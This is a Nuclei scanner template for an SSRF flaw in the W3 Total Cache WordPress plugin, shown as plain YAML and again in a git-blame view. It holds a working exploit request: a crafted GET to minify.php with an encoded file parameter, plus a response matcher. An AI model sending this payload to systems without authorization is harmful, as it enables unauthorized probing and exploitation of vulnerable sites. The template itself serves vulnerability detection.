nuclei-templates/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml

id: w3c-total-cache-ssrf

info:
  name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
  author: random_robbie
  severity: medium
  description: |
    The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
  reference:
    - https://wpvulndb.com/vulnerabilities/8644
    - https://klikki.fi/adv/w3_total_cache.html
  tags: wordpress,wp-plugin,cache,ssrf,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'

    matchers:
      - type: word
        part: body
        words:
          - "NessusFileIncludeTest"
template update 2020-10-06 14:08:59 +00:00			`id: w3c-total-cache-ssrf`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`info:`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00			`name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)`
Updated author names 2021-06-09 12:20:56 +00:00			`author: random_robbie`
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`severity: medium`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00			`description: \|`
			`The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Reference and description 2021-04-18 13:09:44 +00:00			`- https://wpvulndb.com/vulnerabilities/8644`
			`- https://klikki.fi/adv/w3_total_cache.html`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00			`tags: wordpress,wp-plugin,cache,ssrf,wp`
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`matchers:`
			`- type: word`
Update w3c-total-cache-ssrf.yaml 2022-08-10 09:13:01 +00:00			`part: body`
Create w3c-total-cache.yaml 2020-10-06 09:45:54 +00:00			`words:`
			`- "NessusFileIncludeTest"`